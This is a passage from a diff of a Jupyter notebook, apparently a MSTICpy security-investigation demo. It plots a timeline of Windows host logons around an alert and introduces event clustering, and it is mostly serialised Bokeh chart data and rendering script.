22,25,28]},\"id\":\"3445\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#79D151\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#79D151\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3393\",\"type\":\"Diamond\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"3447\",\"type\":\"DaysTicker\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"3336\",\"type\":\"Title\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#29788E\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#29788E\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3382\",\"type\":\"Diamond\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"3451\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"3446\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"3284\"}},\"id\":\"3353\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"3452\",\"type\":\"YearsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#29788E\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#29788E\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3351\",\"type\":\"Circle\"},{\"attributes\":{\"fill_color\":{\"value\":\"#29788E\"},\"line_color\":{\"value\":\"#29788E\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3350\",\"type\":\"Circle\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"3450\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"text\":\"Timeline: Host Logons\"},\"id\":\"3289\",\"type\":\"Title\"},{\"attributes\":{\"data_source\":{\"id\":\"3284\"},\"glyph\":{\"id\":\"3350\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3351\"},\"selection_glyph\":null,\"view\":{\"id\":\"3353\"}},\"id\":\"3352\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#22A784\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#22A784\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3387\",\"type\":\"Diamond\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"3428\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"data\":{\"Account\":[\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\NETWORK SERVICE\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\LOCAL SERVICE\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\"],\"LogonType\":[5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],\"TimeGenerated\":{\"__ndarray__\":\"AEBWiqgzd0IAQIiKqDN3QgDAKYyoM3dCALD5P6Ezd0IAUBJAoTN3QgDAGGihM3dCACBmMaMzd0IAEJRpnzN3QgBQlmmfM3dCAACiaZ8zd0IA8KlpnzN3QgAQ0WmfM3dCAPANap8zd0IAcBBqnzN3QgCgEGqfM3dCANAQap8zd0IAQBFqnzN3QgCQE2qfM3dCAJATap8zd0IAYJZqnzN3QgBAmGqfM3dCAMBxa58zd0IAQA5tnzN3QgDQL22fM3dCAHBcbp8zd0IAUBhvnzN3QgAwGW+fM3dCACBFb58zd0IAsEhvnzN3QgDgmnKfM3dCABCbcp8zd0IAwJxynzN3QgDQnXKfM3dCABCfcp8zd0IAUABznzN3QgCQKHOfM3dCANDEeZ8zd0IAsH18nzN3QgDwfXyfM3dCAPB9fJ8zd0IA8Jp9nzN3QgAgqH+fM3dCADCuf58zd0IAcLl/nzN3QgDgWYGfM3dCALBGhp8zd0IA8GWLnzN3QgBA85afM3dCAOAvl58zd0IAUO6XnzN3QgCwIrOfM3dCAHD2rJ8zd0IAMCmwnzN3QgCQyryfM3dCACDc0aAzd0IAkCq9nzN3QgDQNL2fM3dCAHDGvZ8zd0IAgCe+nzN3QgBgKb6fM3dCAJDnwp8zd0IAMKrEnzN3QgAwsMSfM3dCANDr2J8zd0IA0FnanzN3QgCQzfWfM3dCAGDT9Z8zd0IAwNf1nzN3QgBA+PWfM3dCAPD+9Z8zd0IAoGQaoDN3QgCw8SWgM3dCAABXzZ8zd0IAkML2nzN3QgCQ5hOgM3dCAFD5GaAzd0IA8HeMoDN3QgDwYqagM3dCADDTmaYzd0IAIOGZpjN3QgAgEpumM3dCAHAUm6Yzd0IAMNANpDN3QgAQYx2kM3dCAPAdoKUzd0IA0MqcpzN3QgAw1ZynM3dC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[87]},\"index\":[0,1,2,3,4,5,6,8,11,12,13,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98],\"y_index\":[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3]},\"selected\":{\"id\":\"3422\"},\"selection_policy\":{\"id\":\"3423\"}},\"id\":\"3285\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"source\":{\"id\":\"3285\"}},\"id\":\"3390\",\"type\":\"CDSView\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"3429\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"source\":{\"id\":\"3285\"}},\"id\":\"3358\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"3431\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"3365\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#404387\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#404387\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3377\",\"type\":\"Diamond\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#22A784\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#22A784\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3356\",\"type\":\"Circle\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"3430\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"below\":[{\"id\":\"3299\"}],\"center\":[{\"id\":\"3302\"},{\"id\":\"3306\"},{\"id\":\"3407\"}],\"left\":[{\"id\":\"3303\"},{\"id\":\"3396\"}],\"min_border_left\":50,\"plot_height\":200,\"plot_width\":900,\"renderers\":[{\"id\":\"3374\"},{\"id\":\"3379\"},{\"id\":\"3384\"},{\"id\":\"3389\"},{\"id\":\"3394\"},{\"id\":\"3405\"}],\"title\":{\"id\":\"3289\"},\"toolbar\":{\"id\":\"3313\"},\"x_range\":{\"id\":\"3291\"},\"x_scale\":{\"id\":\"3295\"},\"y_range\":{\"id\":\"3293\"},\"y_scale\":{\"id\":\"3297\"}},\"id\":\"3288\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"fill_color\":{\"value\":\"#22A784\"},\"line_color\":{\"value\":\"#22A784\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3355\",\"type\":\"Circle\"},{\"attributes\":{\"data_source\":{\"id\":\"3285\"},\"glyph\":{\"id\":\"3355\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3356\"},\"selection_glyph\":null,\"view\":{\"id\":\"3358\"}},\"id\":\"3357\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"3435\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"3311\",\"type\":\"PanTool\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"3436\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"3284\"},\"glyph\":{\"id\":\"3382\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3383\"},\"selection_glyph\":null,\"view\":{\"id\":\"3385\"}},\"id\":\"3384\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#440154\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3372\",\"type\":\"Diamond\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"3432\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"3284\"}},\"id\":\"3385\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"3434\",\"type\":\"DaysTicker\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"3321\",\"type\":\"Title\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"3438\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data\":{\"Account\":[\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\"],\"LogonType\":[3,3],\"TimeGenerated\":{\"__ndarray__\":\"ANDlu58zd0IAcAm8nzN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[2]},\"index\":[58,59],\"y_index\":[2,2]},\"selected\":{\"id\":\"3420\"},\"selection_policy\":{\"id\":\"3421\"}},\"id\":\"3284\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_color\":{\"value\":\"#79D151\"},\"line_color\":{\"value\":\"#79D151\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3360\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"3433\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"3283\"}},\"id\":\"3380\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"3439\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"3297\",\"type\":\"LinearScale\"},{\"attributes\":{\"source\":{\"id\":\"3282\"}},\"id\":\"3375\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#22A784\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#22A784\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3388\",\"type\":\"Diamond\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#404387\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#404387\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3378\",\"type\":\"Diamond\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#29788E\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#29788E\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3383\",\"type\":\"Diamond\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#79D151\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#79D151\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3361\",\"type\":\"Circle\"},{\"attributes\":{\"data_source\":{\"id\":\"3283\"},\"glyph\":{\"id\":\"3377\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3378\"},\"selection_glyph\":null,\"view\":{\"id\":\"3380\"}},\"id\":\"3379\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"3437\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data\":{\"Account\":[\"BlackHatDemoHos\\\\timvic\",\"BlackHatDemoHos\\\\timvic\"],\"LogonType\":[10,10],\"TimeGenerated\":{\"__ndarray__\":\"AOC5vJ8zd0IA4Lm8nzN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[2]},\"index\":[63,64],\"y_index\":[4,4]},\"selected\":{\"id\":\"3424\"},\"selection_policy\":{\"id\":\"3425\"}},\"id\":\"3286\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"label\":{\"value\":\"3\"},\"renderers\":[{\"id\":\"3384\"}]},\"id\":\"3399\",\"type\":\"LegendItem\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"3337\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3373\",\"type\":\"Diamond\"},{\"attributes\":{\"label\":{\"value\":\"5\"},\"renderers\":[{\"id\":\"3389\"}]},\"id\":\"3400\",\"type\":\"LegendItem\"},{\"attributes\":{\"background_fill_alpha\":0.5,\"background_fill_color\":\"white\",\"border_line_color\":\"red\",\"render_mode\":\"css\",\"text\":\"< Alert time\",\"text_font_size\":\"8pt\",\"x\":1594405727000.0,\"y\":0,\"y_offset\":10},\"id\":\"3407\",\"type\":\"Label\"},{\"attributes\":{\"label\":{\"value\":\"10\"},\"renderers\":[{\"id\":\"3394\"}]},\"id\":\"3401\",\"type\":\"LegendItem\"},{\"attributes\":{\"data_source\":{\"id\":\"3402\"},\"glyph\":{\"id\":\"3403\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3404\"},\"selection_glyph\":null,\"view\":{\"id\":\"3406\"}},\"id\":\"3405\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"3295\",\"type\":\"LinearScale\"},{\"attributes\":{\"line_color\":\"red\",\"line_dash\":[6],\"line_width\":2,\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"3403\",\"type\":\"Line\"},{\"attributes\":{\"end\":1594415865987.0,\"start\":1594404370863.0},\"id\":\"3291\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"3416\",\"type\":\"Selection\"},{\"attributes\":{\"end\":1594416344950.5,\"start\":1594403891899.5},\"id\":\"3323\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"3417\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"3287\"},{\"id\":\"3307\"},{\"id\":\"3308\"},{\"id\":\"3309\"},{\"id\":\"3310\"},{\"id\":\"3311\"}]},\"id\":\"3313\",\"type\":\"Toolbar\"},{\"attributes\":{\"data_source\":{\"id\":\"3282\"},\"glyph\":{\"id\":\"3372\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3373\"},\"selection_glyph\":null,\"view\":{\"id\":\"3375\"}},\"id\":\"3374\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"Tooltip\":\"printf\"},\"tooltips\":[[\"LogonType\",\"@LogonType\"],[\"Account\",\"@Account\"],[\"TimeGenerated\",\"@TimeGenerated\"]]},\"id\":\"3287\",\"type\":\"HoverTool\"},{\"attributes\":{},\"id\":\"3325\",\"type\":\"DataRange1d\"}],\"root_ids\":[\"3408\"]},\"title\":\"Bokeh Application\",\"version\":\"2.1.1\"}};\n",
+       "  var render_items = [{\"docid\":\"6109e4a9-035b-4f8e-88e5-5dedb0c15908\",\"root_ids\":[\"3408\"],\"roots\":{\"3408\":\"1a256f3e-741c-4229-867d-e1987a135443\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "3408"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.models.layouts.Column\">Column</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'3408', <span id=\"3728\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">children&nbsp;=&nbsp;[Figure(id='3288', ...), Figure(id='3320', ...)],</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;None,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">rows&nbsp;=&nbsp;'auto',</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">spacing&nbsp;=&nbsp;0,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;None,</div></div><div class=\"3727\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto')</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"3728\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"3727\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Column(id='3408', ...)"
+      ]
+     },
+     "execution_count": 27,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Acquire data using a built in query\n",
+    "host_logons = qry_prov.WindowsSecurity.list_host_logons(start=start,end=end, host_name=host_name)\n",
+    "\n",
+    "# Display timeline\n",
+    "tooltip_cols = [\"TimeGenerated\", \"Account\", \"LogonType\", 'TimeGenerated']\n",
+    "nbdisplay.display_timeline(data=host_logons, alert=rel_alert_select.selected_alert, title=\"Host Logons\", source_columns = tooltip_cols, group_by = \"LogonType\", height=200)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "When presented with a large number of events such as we have here its useful to cluster these into a more managable number of groups. MSTICpy contains [clustering features](https://msticpy.readthedocs.io/en/latest/msticpy.sectools.html?highlight=cluster_events#msticpy.sectools.eventcluster.dbcluster_events) that can be used against a number of data types. Once clustering is complete we use another [widget](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html?highlight=SelectItem#msticpy.nbtools.nbwidgets.SelectItem) to let the user select the cluster they want to focus on."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 28,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "ce07226b395c4a7993b1ea20c68e4e3c",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "        <style>\n",
+       "            .table_logon {border-collapse: collapse; width: 50%;}\n",
+       "            .cell_logon {border: 1px solid #ddd !important;\n",
+       "                text-align: left !important; padding: 15px !important;}\n",
+       "        </style>\n",
